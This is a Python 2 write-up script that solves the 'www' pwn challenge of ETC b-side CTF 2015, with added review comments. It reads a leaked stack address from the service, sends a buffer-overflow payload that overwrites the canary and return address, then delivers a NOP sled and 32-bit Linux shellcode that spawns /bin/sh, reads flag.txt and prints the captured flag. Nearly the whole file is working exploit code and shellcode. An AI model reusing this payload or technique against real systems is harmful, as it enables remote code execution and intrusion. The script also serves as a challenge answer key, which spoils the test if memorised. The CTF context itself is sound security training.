# ETC b-side ctf 2015 - www   LF0827   2015. 3. 18. 06:19
#
# Write-up script for the "www" challenge. Python 2 (print statement,
# raw_input). Connect(), p() and sleep() are not defined in this file and
# presumably come from the star-imported helper module below -- TODO confirm.
from lsm import *

# Challenge endpoint used by the write-up.
host = "www.termsec.net"
port = 17284

# Raw 32-bit Linux x86 machine code (each "\xcd\x80" pair is an int 0x80
# syscall). It is only used once, appended behind the NOP sled in payload2.
shellcode = ("\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")

s = Connect(host, port)

# The service's first message is read and a 10-character hex number is
# copied out of fixed offsets 87..96 of it; the offsets are tied to this
# challenge's exact banner layout and will not survive a different build.
# NOTE(review): recv(264) is not guaranteed to return the full 264 bytes;
# on a short read reading[i] raises IndexError instead of failing cleanly,
# and int(first_addr, 16) raises ValueError if the slice is not hex.
reading = s.recv(264)
first_addr = ''
for i in range(87, (87+10)):
    first_addr += reading[i]
print "first_addr : "+str(first_addr)  # str() is redundant: first_addr is already a str

# Two stack locations derived from the address in the banner by fixed offsets
# (constants specific to this binary, see the attached IDA database).
canary_loc = int(first_addr, 16)-0x131
ret_loc = int(first_addr, 16)-0xe4

# First line sent to the service: 41 bytes of filler followed by three values
# packed with p() (presumably little-endian 32-bit -- TODO confirm in lsm).
payload1 = ''
payload1 += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJKKKL" # dummy
payload1 += p(ret_loc) #jmp to NOP
payload1 += p(canary_loc) # canary location in stack
payload1 += p(0x08049d68) # randval using canary in code
s.send(payload1+'\n')
sleep(2)  # let the service process the first line before the second is sent

# Second line sent: 130 NOP bytes (0x90) followed by the shellcode above.
payload2 = ''
payload2 += "\x90"*130
payload2 += shellcode
s.send(payload2+'\n')

# Drain whatever the service prints, then read the flag file.
print s.recv(100)
print s.recv(100)
print s.recv(1024)
sleep(1)
s.send("cat flag.txt\n")
print s.recv(100)

# Dead code: this is a bare string literal, not executed. It is an optional
# interactive loop the author left in for manual use.
"""
while 1:
    tmp = raw_input("$ ")
    if len(tmp):
        s.send(tmp+"\n")
    else:
        continue
    print s.recv(4096)
"""
#flag{K33P_ST4T1C_L1K3_W00L_F4BR1C}

# Attachments from the original post:
#   www-6c895cf622477d1bd2969ddbdf7c64185db9a41e
#   www-6c895cf622477d1bd2969ddbdf7c64185db9a41e.idb